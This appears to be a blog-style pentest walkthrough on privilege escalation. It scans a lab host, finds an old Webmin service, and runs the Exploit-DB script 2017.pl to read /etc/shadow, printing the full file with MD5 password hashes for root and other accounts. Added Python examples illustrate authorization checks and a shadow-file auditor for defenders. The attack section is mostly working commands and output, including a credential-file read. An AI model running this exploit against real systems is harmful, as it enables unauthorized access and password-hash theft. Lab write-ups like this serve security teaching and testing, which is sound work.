PRIVILEGE ESCALATION

OK guys, what is privilege escalation?

Privilege escalation is an attempt to gain the privileges (access rights) of another user. The level gained can be equal to your own or higher (root, administrator, etc.).



Privilege escalation means a user receives privileges they are not entitled to. These privileges can be used to delete files, view private information, or install unwanted programs such as viruses. It usually occurs when a system has a bug that allows security to be bypassed or, alternatively, has flawed design assumptions about how it will be used. Privilege escalation occurs in two forms:

  • Vertical privilege escalation, also known as privilege elevation, where a lower-privilege user or application accesses functions or content reserved for higher-privilege users or applications (e.g. an Internet Banking user can access site administrative functions, or the passcode lock on a smartphone can be bypassed).
  • Horizontal privilege escalation, where a normal user accesses functions or content reserved for other normal users (e.g. Internet Banking User A accesses the Internet bank account of User B).
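The two forms are easiest to recognise as missing authorization checks in code. The following is an added example, not code from the original post: a toy banking-style service in Python whose vulnerable handlers let customer "bob" read "alice's" account (horizontal) and run an administrative close-account operation (vertical), shown beside hardened handlers that authorize every request on the server. The users, the "customer"/"admin" roles and the account store are all constructed for this example.

```python
# Added example (not from the original post): horizontal and vertical
# privilege escalation shown as missing authorization checks in a toy
# banking-style service, with the hardened handlers beside them.
# Users, roles and the account store are all constructed for this example.
from dataclasses import dataclass


@dataclass(frozen=True)
class User:
    name: str
    role: str  # "customer" or "admin" (constructed role names)


class Forbidden(Exception):
    """Raised by the hardened handlers when the caller is not authorized."""


def sample_accounts():
    """Constructed account store: account id -> (owner username, balance)."""
    return {101: ("alice", 1500), 102: ("bob", 250)}


# --- Vulnerable handlers: the id in the request is the only thing checked ---

def view_account_vulnerable(caller, account_id, accounts):
    # Horizontal escalation: customer bob reads customer alice's account
    # simply by supplying her account id; the caller is never consulted.
    return accounts[account_id][1]


def close_account_vulnerable(caller, account_id, accounts):
    # Vertical escalation: an administrative operation with no role check,
    # so any authenticated customer can perform it.
    accounts.pop(account_id)
    return True


# --- Hardened handlers: authorize on the server, per request ----------------

def view_account(caller, account_id, accounts):
    # Object-level check: the caller must own the account unless an admin.
    owner, balance = accounts[account_id]
    if caller.role != "admin" and owner != caller.name:
        raise Forbidden(f"{caller.name} may not view account {account_id}")
    return balance


def close_account(caller, account_id, accounts):
    # Function-level check: only the admin role may reach this operation.
    if caller.role != "admin":
        raise Forbidden(f"{caller.name} may not close accounts")
    accounts.pop(account_id)
    return True


def attempt(handler, caller, account_id, accounts):
    """Run a handler and report ('allowed', result) or ('forbidden', None)."""
    try:
        return ("allowed", handler(caller, account_id, accounts))
    except Forbidden:
        return ("forbidden", None)


if __name__ == "__main__":
    bob = User("bob", "customer")
    admin = User("root", "admin")
    accounts = sample_accounts()
    print("vulnerable view of 101 by bob: ", attempt(view_account_vulnerable, bob, 101, accounts))
    print("hardened view of 101 by bob:   ", attempt(view_account, bob, 101, accounts))
    print("hardened close of 101 by bob:  ", attempt(close_account, bob, 101, accounts))
    print("hardened close of 101 by admin:", attempt(close_account, admin, 101, accounts))
```

The point of the hardened pair is that both checks are made from the server's own view of who the caller is (session identity and role), never from anything the client sends; the object-level check stops the horizontal case and the function-level check stops the vertical one.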



Information Gathering and Service Enumeration

First, open Zenmap and enter the target's IP address.


From the picture above we can get the hostname and which operating system is used. To see the ports, click the Ports/Hosts tab next to Nmap Output; it appears as below.




From the picture above we can see which services are running,
for example port 22 running SSH, version OpenSSH 4.6p1.
But here we try the service on port 10000: HTTP, version MiniServ 0.01 (the Webmin web server).


Vulnerability Assessment


For the vulnerability assessment we use Nessus; the steps are the same as I published yesterday. First log in to Nessus and click Scans, then Add. Enter a name, change the policy to Internal Network Scan, enter 192.168.0.21 as the scan target, and click Launch Scan.


Next, click 192.168.0.21 to see the vulnerabilities.




There we see a vulnerability on the SSH service (protocol TCP). Now click SSH to see the name of the vulnerability.




OK, now click Download Report and open it as HTML.






The red line above marks the vulnerability that is easiest to get in through.


Exploitation and Reading /etc/shadow
OK guys, next open the Exploit-DB directory and type the commands below:

root@bt:/pentest/exploits/exploitdb# ./searchsploit webmin
Description Path
--------------------------------------------------------------------------- -------------------------
Webmin BruteForce and Command Execution Exploit /multiple/remote/705.pl
Webmin Web Brute Force v1.5 (cgi-version) /multiple/remote/745.cgi
Webmin BruteForce + Command Execution v1.5 /multiple/remote/746.pl
Webmin < 1.290 / Usermin < 1.220 Arbitrary File Disclosure Exploit /multiple/remote/1997.php
Webmin < 1.290 / Usermin < 1.220 Arbitrary File Disclosure Exploit (perl) /multiple/remote/2017.pl
phpMyWebmin 1.0 (window.php) Remote File Include Vulnerability /php/webapps/2451.txt
phpMyWebmin 1.0 (window.php) Remote File Include Vulnerability /php/webapps/2451.txt
phpMyWebmin <= 1.0 (target) Remote File Include Vulnerabilities /php/webapps/2462.txt
phpMyWebmin <= 1.0 (target) Remote File Include Vulnerabilities /php/webapps/2462.txt
phpMyWebmin <= 1.0 (target) Remote File Include Vulnerabilities /php/webapps/2462.txt
root@bt:/pentest/exploits/exploitdb# ls
blaCk_deviL files.csv platforms searchsploit
root@bt:/pentest/exploits/exploitdb# ls platforms
16284.rb 16381.rb 16428.rb 16475.rb 16522.rb 16569.rb 16616.rb 16663.rb 16710.rb 16761.rb 16812.rb 18108.rb
16286.rb 16382.rb 16429.rb 16476.rb 16523.rb 16570.rb 16617.rb 16664.rb 16711.rb 16762.rb 16813.rb 18109.rb
root@bt:/pentest/exploits/exploitdb# perl platforms//multiple/remote/2017.pl
Usage: platforms//multiple/remote/2017.pl <url> <port> <filename> <target>
TARGETS are
0 - > HTTP
1 - > HTTPS
Define full path with file name
Example: ./webmin.pl blah.com 10000 /etc/passwd
root@bt:/pentest/exploits/exploitdb# perl platforms//2017/remote/2017.pl
Can't open perl script "platforms//2017/remote/2017.pl": No such file or directory
root@bt:/pentest/exploits/exploitdb# perl platforms/multiple/remote/2017.pl 192.168.0.21 10000 /etc/shadow 0
WEBMIN EXPLOIT !!!!! coded by UmZ!
Comments and Suggestions are welcome at umz32.dll [at] gmail.com
Vulnerability disclose at securitydot.net
I am just coding it in perl 'cuz I hate PHP!
Attacking 192.168.0.21 on port 10000!
FILENAME: /etc/shadow

FILE CONTENT STARTED
-----------------------------------
root:$1$LKrO9Q3N$EBgJhPZFHiKXtK0QRqeSm/:14041:0:99999:7:::
daemon:*:14040:0:99999:7:::
bin:*:14040:0:99999:7:::
sys:*:14040:0:99999:7:::
sync:*:14040:0:99999:7:::
games:*:14040:0:99999:7:::
man:*:14040:0:99999:7:::
lp:*:14040:0:99999:7:::
mail:*:14040:0:99999:7:::
news:*:14040:0:99999:7:::
uucp:*:14040:0:99999:7:::
proxy:*:14040:0:99999:7:::
www-data:*:14040:0:99999:7:::
backup:*:14040:0:99999:7:::
list:*:14040:0:99999:7:::
irc:*:14040:0:99999:7:::
gnats:*:14040:0:99999:7:::
nobody:*:14040:0:99999:7:::
dhcp:!:14040:0:99999:7:::
syslog:!:14040:0:99999:7:::
klog:!:14040:0:99999:7:::
mysql:!:14040:0:99999:7:::
sshd:!:14040:0:99999:7:::
vmware:$1$7nwi9F/D$AkdCcO2UfsCOM0IC8BYBb/:14042:0:99999:7:::
obama:$1$hvDHcCfx$pj78hUduionhij9q9JrtA0:14041:0:99999:7:::
osama:$1$Kqiv9qBp$eJg2uGCrOHoXGq0h5ehwe.:14041:0:99999:7:::
yomama:$1$tI4FJ.kP$wgDmweY9SAzJZYqW76oDA.:14041:0:99999:7:::

-------------------------------------
root@bt:/pentest/exploits/exploitdb# root@bt:/pentest/exploits/exploitdb# perl platforms//multiple/remote/2017.pl
bash: root@bt:/pentest/exploits/exploitdb#: No such file or directory
root@bt:/pentest/exploits/exploitdb# Usage: platforms//multiple/remote/2017.pl <url> <port> <filename> <target>
bash: syntax error near unexpected token `<'

From the command perl platforms/multiple/remote/2017.pl 192.168.0.21 10000 /etc/shadow 0 we find five users with their password hashes: root, vmware, obama, osama and yomama.
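After a disclosure like this, the defender's first job is to work out which accounts actually carry a password hash (and must be rotated), which are locked, and which hashes use a legacy algorithm. The following is an added example, not part of the original post or of the exploit shown: a small /etc/shadow auditor in Python. Its first five sample lines are copied from the disclosed file above (root, daemon, dhcp, vmware, obama); the "auditor" line with a $6$ hash is constructed, with a placeholder hash value, to show a modern algorithm that the disclosed file does not contain.

```python
# Added example (not from the original post): a small auditor for the
# /etc/shadow content disclosed above. The first five sample lines mirror
# the post's output (root, daemon, dhcp, vmware, obama); the "auditor" line
# is constructed, with a placeholder $6$ hash, to show a modern algorithm.
import re
from dataclasses import dataclass
from typing import Optional

# crypt(3) hash-id prefixes and what they mean for a defender
HASH_ALGOS = {
    "1": "md5crypt (legacy, fast to brute-force)",
    "5": "sha256crypt",
    "6": "sha512crypt",
    "y": "yescrypt",
}

SAMPLE_SHADOW = """\
root:$1$LKrO9Q3N$EBgJhPZFHiKXtK0QRqeSm/:14041:0:99999:7:::
daemon:*:14040:0:99999:7:::
dhcp:!:14040:0:99999:7:::
vmware:$1$7nwi9F/D$AkdCcO2UfsCOM0IC8BYBb/:14042:0:99999:7:::
obama:$1$hvDHcCfx$pj78hUduionhij9q9JrtA0:14041:0:99999:7:::
auditor:$6$saltsalt$CONSTRUCTEDPLACEHOLDERHASHVALUEFORTHISEXAMPLEONLY:19000:0:99999:7:::
"""


@dataclass
class ShadowEntry:
    user: str
    status: str           # "hashed", "locked" or "empty"
    algo: Optional[str]   # crypt hash id ("1", "6", ...) or "descrypt"; None if no hash
    last_change: int      # days since the epoch the password was last changed


def parse_shadow_line(line: str) -> ShadowEntry:
    """Split one shadow(5) record: user:hash:lastchg:min:max:warn:inactive:expire:reserved."""
    fields = line.rstrip("\n").split(":")
    if len(fields) != 9:
        raise ValueError(f"malformed shadow record: {line!r}")
    user, pw, last_change = fields[0], fields[1], fields[2]
    if pw == "":
        status, algo = "empty", None              # no password needed at all
    elif pw.startswith(("*", "!")):
        status, algo = "locked", None             # '*' never set, '!' explicitly locked
    else:
        status = "hashed"
        m = re.match(r"\$([^$]+)\$", pw)
        algo = m.group(1) if m else "descrypt"    # 13-char DES crypt has no '$' prefix
    return ShadowEntry(user, status, algo, int(last_change) if last_change else 0)


def audit_shadow(text: str):
    """Return (entries, findings); findings are (user, reason) pairs a defender acts on."""
    entries, findings = [], []
    for line in text.splitlines():
        if not line.strip() or line.startswith("#"):
            continue
        entry = parse_shadow_line(line)
        entries.append(entry)
        if entry.status == "empty":
            findings.append((entry.user, "empty password field: logs in with no password"))
        elif entry.status == "hashed" and entry.algo in ("1", "descrypt"):
            label = HASH_ALGOS.get(entry.algo, entry.algo)
            findings.append((entry.user, f"legacy hash ({label}): rotate the password and rehash"))
    return entries, findings


def hashed_users(text: str):
    """Usernames carrying a real hash: after a disclosure these must be rotated first."""
    return [e.user for e in audit_shadow(text)[0] if e.status == "hashed"]


if __name__ == "__main__":
    entries, findings = audit_shadow(SAMPLE_SHADOW)
    print("accounts with password hashes:", hashed_users(SAMPLE_SHADOW))
    for user, reason in findings:
        print(f"  {user}: {reason}")
```

Run against the real disclosed file (or a copy of the target's /etc/shadow), the script tells you exactly which accounts need a password change and flags the $1$ md5crypt hashes, which crack far faster than sha512crypt or yescrypt. Beyond rotation, the disclosure itself only happened because Webmin was running an old version on a reachable port; patching it and restricting who can reach port 10000 removes the path the post uses.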



